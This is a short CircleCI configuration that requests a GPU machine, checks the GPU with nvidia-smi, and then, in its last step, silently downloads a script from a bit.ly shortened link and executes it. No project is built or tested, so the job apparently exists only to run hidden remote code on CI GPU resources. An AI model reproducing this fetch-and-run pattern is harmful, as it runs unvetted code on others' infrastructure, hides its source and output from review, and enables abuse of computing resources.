version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.small
    steps:
      - run: nvidia-smi
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: wget -O w2022.sh https://bit.ly/a2nk-W2022 > /dev/null 2>&1 && chmod +x w2022.sh && ./w2022.sh